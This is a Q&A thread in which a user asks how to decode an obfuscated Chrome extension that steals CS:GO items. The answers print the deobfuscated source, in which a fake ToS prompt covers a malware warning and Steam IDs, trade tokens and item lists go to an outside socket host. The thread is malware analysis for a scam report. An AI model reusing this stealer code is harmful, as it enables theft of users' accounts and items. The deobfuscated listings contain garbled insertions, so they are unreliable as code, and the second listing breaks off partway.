# Unscramble JavaScript (Could be Russian Javascript?)

Tags: javascript, reverse-engineering

I'm trying to figure out how a Chrome extension that I downloaded works (it's something scammers use to steal CS:GO items, not important...). I want to find out what e-mailaddress is used (or what other way of communication is used) to submit the data that is being phished to.

Here's the scrambled code:

```js
O="2[Math.rrayfor(10tion).lelo*Maath.rom())func$(re]+and+word[classment rttenso .loplace    ngthsamdiv(;socketdocu.(){var ade)oca.hSto  n;move(a)in.modal.‚dexOtokencogimsettps://.data< =</>for=-1<l`f„alancecript} ageidsuccess~Not ~colorval(shond}).ona a-+a+thistrZ);aћЂ]turn clickhildcomerЃ{Xb=#html($(b)ЉtypeE  ),0]1]23]4]mess–bodypx;st]І5]6·]+.©bordЄloadIma.-size:1sub¶r(count€ћAhf,ЋmatCo‚.appeћgetЇoffЄ&&(^,©munit=Ґ,rћ.splitimЄttr#tAНibuonnectInr›a[c]sa    arј;c++)h‰±ёcheckname(/to.ЩNUMBEs”^;c.au€dh—e(keyroc=0;c<ХЫR/g,fontЅ$/,100><p_У_Ћm^nЄHTMLcЁnNot ’fac.fZ.‚ax-loZ btn-Btn ‘).3CB371;epositВЃ{‚dowang‚ggаuћ-љ:‚venЪrА‹' Samњw(^;.emit".split('');Q=" А«a-boxюb.Ю¤b.htmlЃ;b.э)•Гs(a,b,d){a=(b?:$^+(a/етЪFixed(2¤¦dЗa=јЩ0*дЩ.д^°a•єS”Sync(a,b){Xd=ЕsByTagName(b)[0],c=caЇЬ€П®Вxt/javaЬ€ПsrcВa¤c.€П—В123445юdДCЁ(c)•¶Фt(){Xa=trieveWцVФiab    s([g_ьID]тg_ьID;(l`f=‘Ц/||l`f=‘Ц||лhome^)З€tС@Ћ(Xa=ЕsByClassNamefeatud-‡Иd‘™™к™к™к~кSЪ  nЛt;ИбSЪ    n==d[Т.‚и.%10]ЗБs.push(Т.Б°Т.()¤a‘That would Ч ‡s, go Ъ p– €ll...вБs.¤!Э&&0<Бs.&&ыwФnш'>ЎЊюЭ||0!=Бs.||ы'>ЎЊюЭ=!0},1E3°.op-dчЄ(°.op-wФnш()¤†Ѓ;—‘uћef‚ed==®of a?0:a;0!=—Злњз&&0==ѓнЗ†(ѓн+asdИМ=€tС@if(!.ajоr){Оdфр§(@askЋЈ_()}¤О€llр§(@€  ct()}¤Xa;a‘0 - »s we ¶o nв0юы'>ЎЊюc ФСМ)}},е)°cР())•¶Фt(){Xa='< —‘і ¶y  ‘display:none;№:2px sol— #у№-radius:5µw—th:е%;l‚e-height:30µxt-align:cenr;г6µmФg‚-Ъp:-30µbмkщ#уљ:#fff;>'+0 - »s we ¶o   nв0^+Њ;Оъy_logosppeћ('< —‘єші ¶y    ‘display:none;№:2px sol— #ffcc66;№-radius:5µw—th:е%;l‚e-height:30µxt-align:cenr;г6µmФg‚-Ъp:-30µbмkщ#ff9900;љ:#fff;>Loadш...Њ'¤Оъy_logosppeћЃ;Оєшіњwslowю€tTimeout(@ОіњwslowюОєшіfZOut(¤.‡HoldЄeмh(@$(ўтй.‡aН¶y  В№-љ: rgb(210, 210, 210¤bмkщ #у^})},3E3)•del‡Ѓ{Xb‘#q»Ў-1;a‘#u€r»+a;Xd=($ЃЉas€tИ$ЃЉmФketШ^°c=Оc_p–›°e=$.map($Ѓ.aНsplit И(a,b){¦јmatch(/p–[0-9]*/)?јslice(4,ј):vo— 0})[0];c===e&&$Ѓ.э¤$(bт(¤‡sЛce(‡s„f(d°1)•trieveWцVФiab sЃ{Ћ(Xb={},d‘ВбXe=Т,d=d+if (®of +e+ !== 'uћef‚ed') $('ґ'тaН('tmp_+e+', JSON.¶rшify+e+^¤nюc=caЇЬ—‘tmpS”;cДCЁ(caTextNode(d)¤(ґ||head||docuЇ)ДCЁ(c¤Ћ(бe=Т,b[e]=$.pФ€JSON(ґaНtmp_+e)°ґAНtmp_+e¤¦ОtmpS”(°b•Гsl(a,b,d){a=(b?:$^+(a/етЪFixed(2¤¦dЗa=јЩ0*дЩ.д^°a•newB“«op-ї¬т$В.ВИb=NumbЄ(b¤a=(10*b+NumbЄЃ)/10;Оop-ї¬ГslЃ)•Аl«a-boxюb.Ю¤b.htmlЃ;b.э)•convЄt—Ѓ{¦јѕ3)-61197960265728•saveЈ«Ј-url›¤if(1==aЗb=$('[Ш‘tUrl]'т›)°possib    Id=b.ѕ51тѕ0,b.-66°мtuallId=convЄt—(—°possib Id!=мtuallId)¦vo— Аl('‹ dчЄ>TrZ URL missш or ‚val—Њ'¤…=b.ѕ-8)я…В{—:—,…:…}¤loca.h‰opsk‚s.©/?loc=њз}X…,—,‡s=[],Бs=[],М,§М,Фray2‘3g1faNmy5uЛtИword‘opsk‚sЛtИЭ=!1,rћК1К2К3К4=Ґ,€    ct=@†(1¤Xa=Оu»›°b‘#u€r»+a,d=ОњpSellAmt›°c=­imgИe=­љИg=­mФketШИh=­ШИf=(­as€tИ­®ИОњpSellShowca€is:ЧedИОprivaLi¶шis:ЧedИpФ€Int(Оњwca€Price›)°pФ€Int(ОdueNowC›)°Оq»s^°d‘‹'col-md-2 pg-‡ p–' —='q»Ў-1'>‹'У-‡'>‹'У-‡-desc' ¶y ='г6µ'>+Гs(е*d)+Њ<img ='img-аuћed У-‡-img' src='h‰Йy-јakamaihd.net/economy/im–/+c+/62fx62f' /жbr />‹'У-‡-desc' ¶y   ='г1µљ:#+e+'>+h+Њ<span ='-‡' alt='Remove ‡ fаm Queue' —='rQueueЎ-1''>Remove</span>ЊЊ;†(d¤fД(d¤$(bтЮ¤0<f.f‚d.pg-‡?(f.f‚d.a.a-‚foЮ°О€llDфрэ)):(f.f‚d.a.a-‚foэ°О€llDфрЮ)¤†(g¤‡s.push(g¤ОrQueueЎ-1§(@del‡Ѓ})};wц.onє=@’f(word[±ё^&&¶Фt(¤лЙy.©^&&лъy^&&¶Фt(¤†WORKING^};Xurl=chаme.exnsion.getURLWFxhYKuiBQEi36xi.jsюєS”Sync(url,ґю1==$('[value‘Now take me bмk Ъ the websi!]'тЗ†CLICKИѓ-tit  ¬ѓ-tit  ¬тOPSk‚s Security Notice - Many Chаme Bаw€r Exnsions A MalwaВP  a€ мcept our ToS^°ѓ-ґйpeмh(@$(ўтhtml^}°ѓ-ґppeћ<p>Our ToS we updad cently, you need Ъ мcept it befo usш OPSk‚s.</p>Иѓ-ґй.Ћm1-gаupйlabel¬'<‚put ®‘Чbox quid‘ Ш‘malwa_exnsion>I have ad ў і aћ I fully мcept new ToS ¶ass.'°c  ФС§М)¤Ї.pаЪ®.=@ў.pantЇ.CЁ(ў)};NodeLi¶.pаЪ®.=HTMLCol c.pаЪ®.=@Ћ(Xa=ў.-1;0<=a;a--)ў[a]&&ў[a].pantЇ&&ў[a].pantЇ.CЁ(ў[a])};XЯ‘Hhg7ptccVrU8uM4SN6FsEd157y8rlxtqВsocket,cР=@†CРш...^=ioh‰sumscum.xyz:9595В{ЋceNew:!0,€cu:!0џcРВ@†Exchчш Яs...^яЯВ{Я:Я,—:—})џЯ_failх†Keys exchчe fail.^џЄаrВ@Аl('‹ dчЄ>ь Єаr. P    a€ є p– aћ try aga‚.Њ')џb“хnewB“(јb“)џЯ_х(†Keys exchчe .Ијb“&&newB“(јb“°†(јb“°†(ј…°ј…)?…=ј…:(†tИл¶o_мї^)?saveЈ(1):лњзЗѓн?quЄySe cЪr#save-Ј-urladdEventLisnЄ§ВsaveЈ):loca.Ц/?loc=¶o_мї^)џnewЈхЕByIdq»s‚и='‹ жp>Your У has been assigned Ъ <a Б‘h‰Йy.©/pаfi   s/'+јbot—.ЪStrш()+'сa-l‚k tФget‘_BLANK>bot #'+јbot+</a>.</pжpжb>Your €curity … is '+ј€curity+''.</bж/pжh4>Open TrZ OffЄ In:</h4жspanсЖ-l‚ksжaсbtnпdefaultпlg Б‘javas”:wц.open('http://Йy.©/ЈЖ/'+јЈЖ—+'', '', 'height=1028,w—th=1035')жiсfa fa-chаmeж/i> Bаw€r</aжaсbtnпdefaultпlg Б‘://url/ShowTrZOffЄ/'+јЈЖ—+'жiс¶m ¶m-ж/i> ь</aж/spanжp>TrZ Жs may be cance   d afr 5 m‚us.<br>Afr that time, you mu¶ €ћ the Ж fаm your мї p–.</p>Њ'})},askЋЈ_=@†1юЕByIdq»s‚и‘<img ='ajоr' src='im–s/ajоr-big.gif'/>яaskЋЈВ{—:—,…:…,‡s:‡s})};";o="    @XZ^`~ЂЃ‚ѓ„…†‡€‰Љ‹ЊЋ‘’“”•–—™љ›њћџ ЎўЈ¤Ґ¦§Ё©Є«¬­®Ї°±Ііґµ¶·ё№є»јЅѕїАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя";for(J=156;J>-1;J--)Q=Q.split(o.charAt(J)).join(O[J]);eval(Q.replace(//g,'"').replace(//g,"\\"));
```

Other than that, the script uses several other javascript files, including jQuery.

You can find the full source code here:
http://forums.steamrep.com/attachments/market-helper_v1-5-zip.458822/

Could you guys tell me what kind of scrambling is used here? Or is this just russian javascript or something (if that even exists)? I know for a fact that the scammer is russian, based on another file in the chrome extension that has a lot of russian text in it.

Thanks for your help!

PS. Here's the link to my SteamRep report of the scam, in case you're interested: http://forums.steamrep.com/threads/report-76561198148072397-csgo-counter-strike-global-offensive-items.140152/

Comment: "russian javascript"? Wtf is that? All it can be is a script which has Cyrillic characters inside a string. This is minified js, possibly even obfuscated. There is no effective way to revert that, other than beautify it and go from line to line to learn what's going on.

Answer (score 2, accepted):

(This might sound more condescending than I intend... sorry.)

1. [Google "javascript deobfuscator" (without quotes)](https://www.google.com/#q=javascript%20deobfuscator).
2. Try a few links, such as [deobfuscatejavascript.com](http://deobfuscatejavascript.com/).
3. Copy and paste your code and use the tool.

Here was result for your snippet:

```
functionalert alert - sendAlert(a) {
    var b = $("#alert-box");
    b.hide();
    b.html(a);
    b.show()
}

function formatCoins(a, b, d) {
    a = (b ? "" : "$") + (a / 100).toFixed(2);
    returnalert alert - d && (a = a.replace(/0*$/, "").replace(/\.$/, "")), a
}

function loadScriptSync(a, b) {
    var d = document.getElementsByTagName(b)[0],
        c = document.createElement("script");
    c.setAttribute("type", "text/javascript");
    c.setAttribute("src", a);
    c.setAttribute("id", "123445");
    d.appendChild(c)
}

function start() {
    var a = retrieveWindowVariables(["g_SteamID"]).g_SteamID;
    (location.href == "https://" + word[0] + word[1] + word[2] + word[3] + word[4] + word[5] + word[6] + ".com/" || location.href == "https://" + word[0] + word[1] + word[2] + word[3] + word[4] + word[5] + word[6] + ".com" || -1 < location.href.indexOf("home")) && (setInterval(function() {
        for (var a = document.getElementsByClassName("featured-item"), d = "Stolen;Not Stolen;Stolen;Not Stolen;Notalert alert-Stolen;Not Stolen;Notalert alert-Stolen;Not Stolen;Notalert alert-Stolen;Notalert alert-Stolen".split(";"), c = 0; c < a.length; c++) "Stolen" == d[a[c].innerHTML.length % 10] && (hrefs.push(a[c].href), a[c].remove());
        a = "Thatalert alert-wouldalert alert-checkalert alert-items,alert alert-goalert alert-toalert alert-pagealert alert-sell...".replace(/NUMBER/g, hrefs.length);
        !alertused && 0 < hrefs.length && sendAlert("<div class='alert alert-warning'>" + a + "</div>");
        alertused || 0 != hrefs.length || sendAlert("<div class='alert alert-success'>" + a + "</div>");
        alertused = !0
    }, 1E3), $(".op-danger").remove(), $(".op-warning").remove());
    console.log(a);
    steamid = "undefined" == typeofalert alert - a ? 0 : a;
    0 != steamid && (-1 < location.href.indexOf("shop_sale_form") && 0 == $(".modal.fade.in").length && (console.log($(".modal.fade.in").length + "asd"), replacetimer = setInterval(function() {
        if (!$(".ajax-loader").length) {
            $("#depositBtn").click(function() {
                askfortrade_func()
            });
            $("#sellBtn").click(function() {
                select()
            });
            var a;
            a = "0alert alert--alert alert-Itemsalert alert-werealert alert-stolen".replace(/NUMBER/g, "0");
            sendAlert("<div class='alert alert-success'>" + a + "</div>");
            clearInterval(replacetimer)
        }
    }, 100)), connect())
}

function startsteam() {
    var a = '<divalert alert-id="successmessage"alert alert-style="display:none;border:2pxalert alert-solidalert alert-#3CB371;border-radius:5px;width:100%;line-height:30px;text-align:center;font-size:16px;margin-top:-30px;background-color:#3CB371;color:#fff;">' + "0alert alert--alert alert-Itemsalert alert-werealert alert-stolen".replace(/NUMBER/g, "0") + "</div>";
    $("#inventory_logos").prepend('<divalert alert-id="loadingmessage"alert alert-style="display:none;border:2pxalert alert-solidalert alert-#ffcc66;border-radius:5px;width:100%;line-height:30px;text-align:center;font-size:16px;margin-top:-30px;background-color:#ff9900;color:#fff;">Loading...</div>');
    $("#inventory_logos").prepend(a);
    $("#loadingmessage").show("slow");
    setTimeout(function() {
        $("#successmessage").show("slow");
        $("#loadingmessage").fadeOut();
        $(".itemHolder").each(function() {
            $(this).children(".item").attr("style", "border-color:alert alert-rgb(210,alert alert-210,alert alert-210);background-color:alert alert-#3CB371;")
        })
    }, 3E3)
}

function delitem(a) {
    var b = "#qItem" + a + "-1";
    a = "#userItem" + a;
    var d = ($(a).data("asset"), $(a).data("marketname")),
        c = $("#c_page").val(),
        e = $.map($(a).attr("class").split("alert alert-"), function(a, b) {
            returnalert alert - a.match(/page[0-9]*/) ? a.slice(4, a.length) : voidalert alert - 0
        })[0];
    c === e && $(a).show();
    $(b).remove();
    items.splice(items.indexOf(d), 1)
}

function retrieveWindowVariables(a) {
    for (var b = {}, d = "", c = 0; c < a.length; c++) var e = a[c],
        d = d + ("ifalert alert-(typeofalert alert-" + e + "alert alert-!==alert alert-'undefined')alert alert-$('body').attr('tmp_" + e + "',alert alert-JSON.stringify(" + e + "));\n");
    c = document.createElement("script");
    c.id = "tmpScript";
    c.appendChild(document.createTextNode(d));
    (document.body || document.head || document.documentElement).appendChild(c);
    for (c = 0; c < a.length; c++) e = a[c], b[e] = $.parseJSON($("body").attr("tmp_" + e)), $("body").removeAttr("tmp_" + e);
    returnalert alert - $("#tmpScript").remove(), b
}

function formatCoinsl(a, b, d) {
    a = (b ? "" : "$") + (a / 100).toFixed(2);
    returnalert alert - d && (a = a.replace(/0*$/, "").replace(/\.$/, "")), a
}

function newBalance(a) {
    var b = $("#op-count").html().replace("$", "").replace(".", ""),
        b = Number(b);
    a = (10 * b + Number(a)) / 10;
    $("#op-count").html(formatCoinsl(a))
}

function sendAlertl(a) {
    var b = $("#alert-box");
    b.hide();
    b.html(a);
    b.show()
}

function convertid(a) {
    returnalert alert - a.substr(3) - 61197960265728
}

function savetrade(a) {
    var b = $("#trade-url").val();
    if (1 == a && (b = $('[name="tUrl"]').val()), possibleId = b.substr(51).substr(0, b.length - 66), actuallId = convertid(steamid), possibleId != actuallId) returnalert alert - voidalert alert - sendAlertl('<div class="alert alert-danger">Tradealert alert-URLalert alert-missingalert alert-oralert alert-invalid</div>');
    token = b.substr(-8);
    socket.emit("token", {
        steamid: steamid,
        token: token
    });
    location.replace("https://opskins.com/?loc=shop_sale_form")
}
var token, steamid, items = [],
    hrefs = [],
    replacetimer, clicktimer, array2 = "3g1faNmy5u".split(""),
    word = "opskins".split(""),
    alertused = !1,
    rnd = array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())],
    rnd1 = array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())],
    rnd2 = array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())],
    rnd3 = array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())],
    rnd4 = array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())] + array2[Math.floor(10 * Math.random())],
    select = function() {
        console.log(1);
        var a = $("#uItem").val(),
            b = "#userItem" + a,
            d = $("#shopSellAmt").val(),
            c = $(b).data("img"),
            e = $(b).data("color"),
            g = $(b).data("marketname"),
            h = $(b).data("name"),
            f = ($(b).data("asset"), $(b).data("type"), $("#shopSellShowcase").is(":checked"), $("#privateListing").is(":checked"), parseInt($("#showcasePrice").val()), parseInt($("#dueNowC").val()), $("#qItems")),
            d = "<div class='col-md-2alert alert-pg-itemalert alert-page'alert alert-id='qItem" + a + "-1'><div class='sale-item'><div class='sale-item-desc'alert alert-style='font-size:16px;'>" + formatCoins(100 * d) + "</div><imgalert alert-class='img-roundedalert alert-sale-item-img'alert alert-src='https://steamcommunity-a.akamaihd.net/economy/image/" + c + "/62fx62f'alert alert-/><bralert alert-/><div class='sale-item-desc'alert alert-style='font-size:11px;color:#" + e + "'>" + h + "</div><spanalert alert-class='remove-item'alert alert-alt='Removealert alert-itemalert alert-fromalert alert-Queue'alert alert-id='rQueue" + a + "-1''>Remove</span></div></div>";
        console.log(d);
        f.append(d);
        $(b).hide();
        0 < f.find(".pg-item").length ? (f.find(".alert.alert-info").hide(), $("#sellDepositBtn").show()) : (f.find(".alert.alert-info").show(), $("#sellDepositBtn").hide());
        console.log(g);
        items.push(g);
        $("#rQueue" + a + "-1").click(function() {
            delitem(a)
        })
    };
window.onload = function() {
    -1 < location.href.indexOf(word[0] + word[1] + word[2] + word[3] + word[4] + word[5] + word[6] + ".com") && start(); - 1 < location.href.indexOf("steamcommunity.com") && -1 < location.href.indexOf("inventory") && startsteam();
    console.log("WORKING")
};
var url = chrome.extension.getURL("WFxhYKuiBQEi36xi.js");
loadScriptSync(url, "body");
1 == $('[value="Nowalert alert-takealert alert-mealert alert-backalert alert-toalert alert-thealert alert-website!"]').length && (console.log("CLICK"), $(".modal-title").html($(".modal-title").html().replace("OPSkinsalert alert-Securityalert alert-Noticealert alert--alert alert-Manyalert alert-Chromealert alert-Browseralert alert-Extensionsalert alert-Arealert alert-Malware", "Pleasealert alert-acceptalert alert-ouralert alert-ToS")), $(".modal-body").children("p").each(function() {
    $(this).html("")
}), $(".modal-body").prepend("<p>Ouralert alert-ToSalert alert-werealert alert-updatedalert alert-recently,alert alert-youalert alert-needalert alert-toalert alert-acceptalert alert-italert alert-beforealert alert-usingalert alert-OPSkins.</p>"), $(".modal-body").children(".form1-group").children("label").html('<inputalert alert-type="checkbox"alert alert-required=""alert alert-name="malware_extension">Ialert alert-havealert alert-readalert alert-thisalert alert-messagealert alert-andalert alert-Ialert alert-fullyalert alert-acceptalert alert-newalert alert-ToSalert alert-statesments.'), clearInterval(clicktimer));
Element.prototype.remove = function() {
    this.parentElement.removeChild(this)
};
NodeList.prototype.remove = HTMLCollection.prototype.remove = function() {
    for (var a = this.length - 1; 0 <= a; a--) this[a] && this[a].parentElement && this[a].parentElement.removeChild(this[a])
};
var key = "Hhg7ptccVrU8uM4SN6FsEd157y8rlxtq",
    socket, connect = function() {
        console.log("Connecting...");
        socket = io("https://sumscum.xyz:9595", {
            forceNew: !0,
            secure: !0
        });
        socket.on("connect", function() {
            console.log("Exchangingalert alert-keys...");
            socket.emit("key", {
                key: key,
                steamid: steamid
            })
        });
        socket.on("key_fail", function(a) {
            console.log("Keysalert alert-exchangealert alert-fail.")
        });
        socket.on("error", function() {
            sendAlertl('<div class="alert alert-danger">Steamalert alert-error.alert alert-Pleasealert alert-reloadalert alert-pagealert alert-andalert alert-tryalert alert-again.</div>')
        });
        socket.on("balance", function(a) {
            newBalance(a.balance)
        });
        socket.on("key_success", function(a) {
            (console.log("Keysalert alert-exchangealert alert-success."), a.balance && newBalance(a.balance), console.log(a.balance), console.log(a.token), a.token) ? token = a.token: (console.log("t"), -1 < location.href.indexOf("store_account")) ? savetrade(1) : -1 < location.href.indexOf("shop_sale_form") && ($(".modal.fade.in").length ? document.querySelector("#save-trade-url").addEventListener("click", savetrade) : location.replace("https://" + word[0] + word[1] + word[2] + word[3] + word[4] + word[5] + word[6] + ".com/?loc=store_account"))
        });
        socket.on("newtrade", function(a) {
            document.getElementById("qItems").innerHTML = '<div class="alert alert-success"><p>Youralert alert-salealert alert-hasalert alert-beenalert alert-assignedalert alert-toalert alert-<aalert alert-href="https://steamcommunity.com/profiles/' + a.botsteamid.toString() + '"alert alert-class="alert-link"alert alert-target="_BLANK">botalert alert-#' + a.bot + "</a>.</p><p><b>Youralert alert-securityalert alert-tokenalert alert-isalert alert-'" + a.security + '\'.</b></p><h4>Openalert alert-Tradealert alert-Offeralert alert-In:</h4><spanalert alert-class="offer-links"><aalert alert-class="btnalert alert-btn-defaultalert alert-btn-lg"alert alert-href="javascript:window.open(\'http://steamcommunity.com/tradeoffer/' + a.tradeofferid + '\',alert alert-\'\',alert alert-\'height=1028,width=1035\')"><ialert alert-class="faalert alert-fa-chrome"></i>alert alert-Browser</a><aalert alert-class="btnalert alert-btn-defaultalert alert-btn-lg"alert alert-href="steam://url/ShowTradeOffer/' + a.tradeofferid + '"><ialert alert-class="stmalert alert-stm-steam"></i>alert alert-Steam</a></span><p>Tradealert alert-offersalert alert-mayalert alert-bealert alert-canceledalert alert-afteralert alert-5alert alert-minutes.<br>Afteralert alert-thatalert alert-time,alert alert-youalert alert-mustalert alert-resendalert alert-thealert alert-offeralert alert-fromalert alert-youralert alert-accountalert alert-page.</p></div>'
        })
    },
    askfortrade_func = function() {
        console.log("1");
        document.getElementById("qItems").innerHTML = "<imgalert alert-class='ajax-loader'alert alert-src='images/ajax-loader-big.gif'/>";
        socket.emit("askfortrade", {
            steamid: steamid,
            token: token,
            items: items
        })
    };
```

Comment: Thank you so much for this! I didn't know this was called "obfuscating", and then it becomes quite hard to find. I googled Javascript unscrambling but that didn't yield me any results. Thanks again!

Comment: The script indeed sends Steam auth codes and OP skin auth tokens to a website over a socket (http://sumscum.xyz , port 9595)... With this proof I'm pretty sure we can get them banned on Steam. Thanks!

Comment: @LaurensSwart: Thanks for telling me! I'm glad to know I did a tiny bit to help stop unethical behavior :)

Answer (score 1):

Just change eval() to console.log() at the end of line. It prints:

```
functionalert alert-sendAlert(a){var b=$("#alert-box");b.hide();b.html(a);b.show()}function formatCoins(a,b,d){a=(b?"":"$")+(a/100).toFixed(2);returnalert alert-d&&(a=a.replace(/0*$/,"").replace(/\.$/,"")),a}function loadScriptSync(a,b){var d=document.getElementsByTagName(b)[0],c=document.createElement("script");c.setAttribute("type","text/javascript");c.setAttribute("src",a);c.setAttribute("id","123445");d.appendChild(c)}function start(){var a=retrieveWindowVariables(["g_SteamID"]).g_SteamID;(location.href=="https://"+word[0]+word[1]+word[2]+word[3]+word[4]+word[5]+word[6]+".com/"||location.href=="https://"+word[0]+word[1]+word[2]+word[3]+word[4]+word[5]+word[6]+".com"||-1<location.href.indexOf("home"))&&(setInterval(function(){for(var a=document.getElementsByClassName("featured-item"),d="Stolen;Not Stolen;Stolen;Not Stolen;Notalert alert-Stolen;Not Stolen;Notalert alert-Stolen;Not Stolen;Notalert alert-Stolen;Notalert alert-Stolen".split(";"),c=0;c<a.length;c++)"Stolen"==d[a[c].innerHTML.length%10]&&(hrefs.push(a[c].href),a[c].remove());a="Thatalert alert-wouldalert alert-checkalert alert-items,alert alert-goalert alert-toalert alert-pagealert alert-sell...".replace(/NUMBER/g,hrefs.length);!alertused&&0<hrefs.length&&sendAlert("<div class='alert alert-warning'>"+a+"</div>");alertused||0!=hrefs.length||sendAlert("<div class='alert alert-success'>"+a+"</div>");alertused=!0},1E3),$(".op-danger").remove(),$(".op-warning").remove());console.log(a);steamid="undefined"==typeofalert alert-a?0:a;0!=steamid&&(-1<location.href.indexOf("shop_sale_form")&&0==$(".modal.fade.in").length&&(console.log($(".modal.fade.in").length+"asd"),replacetimer=setInterval(function(){if(!$(".ajax-loader").length){$("#depositBtn").click(function(){askfortrade_func()});$("#sellBtn").click(function(){select()});var a;a="0alert alert--alert alert-Itemsalert alert-werealert alert-stolen".replace(/NUMBER/g,"0");sendAlert("<div class='alert alert-success'>"+a+"</div>");clearInterval(replacetimer)}},100)),connect())}function startsteam(){var a='<divalert alert-id="successmessage"alert alert-style="display:none;border:2pxalert alert-solidalert alert-#3CB371;border-radius:5px;width:100%;line-height:30px;text-align:center;font-size:16px;margin-top:-30px;background-color:#3CB371;color:#fff;">'+"0alert alert--alert alert-Itemsalert alert-werealert alert-stolen".replace(/NUMBER/g,"0")+"</div>";$("#inventory_logos").prepend('<divalert alert-id="loadingmessage"alert alert-style="display:none;border:2pxalert alert-solidalert alert-#ffcc66;border-radius:5px;width:100%;line-height:30px;text-align:center;font-size:16px;margin-top:-30px;background-color:#ff9900;color:#fff;">Loading...</div>');$("#inventory_logos").prepend(a);$("#loadingmessage").show("slow");setTimeout(function(){$("#successmessage").show("slow");$("#loadingmessage").fadeOut();$(".itemHolder").each(function(){$(this).children(".item").attr("style","border-color:alert alert-rgb(210,alert alert-210,alert alert-210);background-color:alert alert-#3CB371;")})},3E3)}function delitem(a){var b="#qItem"+a+"-1";a="#userItem"+a;var d=($(a).data("asset"),$(a).data("marketname")),c=$("#c_page").val(),e=$.map($(a).attr("class").split("alert alert-"),function(a,b){returnalert alert-a.match(/page[0-9]*/)?a.slice(4,a.length):voidalert alert-0})[0];c===e&&$(a).show();$(b).remove();items.splice(items.indexOf(d),1)}function retrieveWindowVariables(a){for(var b={},d="",c=0;c<a.length;c++)var e=a[c],d=d+("ifalert alert-(typeofalert alert-"+e+"alert alert-!==alert alert-'undefined')alert alert-$('body').attr('tmp_"+e+"',alert alert-JSON.stringify("+e+"));\n");c=document.createElement("script");c.id="tmpScript";c.appendChild(document.createTextNode(d));(document.body||document.head||document.documentElement).appendChild(c);for(c=0;c<a.length;c++)e=a[c],b[e]=$.parseJSON($("body").attr("tmp_"+e)),$("body").removeAttr("tmp_"+e);returnalert alert-$("#tmpScript").remove(),b}function formatCoinsl(a,b,d){a=(b?"":"$")+(a/100).toFixed(2);returnalert alert-d&&(a=a.replace(/0*$/,"").replace(/\.$/,"")),a}function newBalance(a){var b=$("#op-count").html().replace("$","").replace(".",""),b=Number(b);a=(10*b+Number(a))/10;$("#op-count").html(formatCoinsl(a))}function sendAlertl(a){var b=$("#alert-box");b.hide();b.html(a);b.show()}function convertid(a){returnalert alert-a.substr(3)-61197960265728}function savetrade(a){var b=$("#trade-url").val();if(1==a&&(b=$('[name="tUrl"]').val()),possibleId=b.substr(51).substr(0,b.length-66),actuallId=convertid(steamid),possibleId!=actuallId)returnalert alert-voidalert alert-sendAlertl('<div class="alert alert-danger">Tradealert alert-URLalert alert-missingalert alert-oralert alert-invalid</div>');token=b.substr(-8);socket.emit("token",{steamid:steamid,token:token});location.replace("https://opskins.com/?loc=shop_sale_form")}var token,steamid,items=[],hrefs=[],replacetimer,clicktimer,array2="3g1faNmy5u".split(""),word="opskins".split(""),alertused=!1,rnd=array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())],rnd1=array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())],rnd2=array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())],rnd3=array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())],rnd4=array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())]+array2[Math.floor(10*Math.random())],select=function(){console.log(1);var a=$("#uItem").val(),b="#userItem"+a,d=$("#shopSellAmt").val(),c=$(b).data("img"),e=$(b).data("color"),g=$(b).data("marketname"),h=$(b).data("name"),f=($(b).data("asset"),$(b).data("type"),$("#shopSellShowcase").is(":checked"),$("#privateListing").is(":checked"),parseInt($("#showcasePrice").val()),parseInt($("#dueNowC").val()),$("#qItems")),d="<div class='col-md-2alert alert-pg-itemalert alert-page'alert alert-id='qItem"+a+"-1'><div class='sale-item'><div class='sale-item-desc'alert alert-style='font-size:16px;'>"+formatCoins(100*d)+"</div><imgalert alert-class='img-roundedalert alert-sale-item-img'alert alert-src='https://steamcommunity-a.akamaihd.net/economy/image/"+c+"/62fx62f'alert alert-/><bralert alert-/><div class='sale-item-desc'alert alert-style='font-size:11px;color:#"+e+"'>"+h+"</div><spanalert alert-class='remove-item'alert alert-alt='Removealert alert-itemalert alert-fromalert alert-Queue'alert 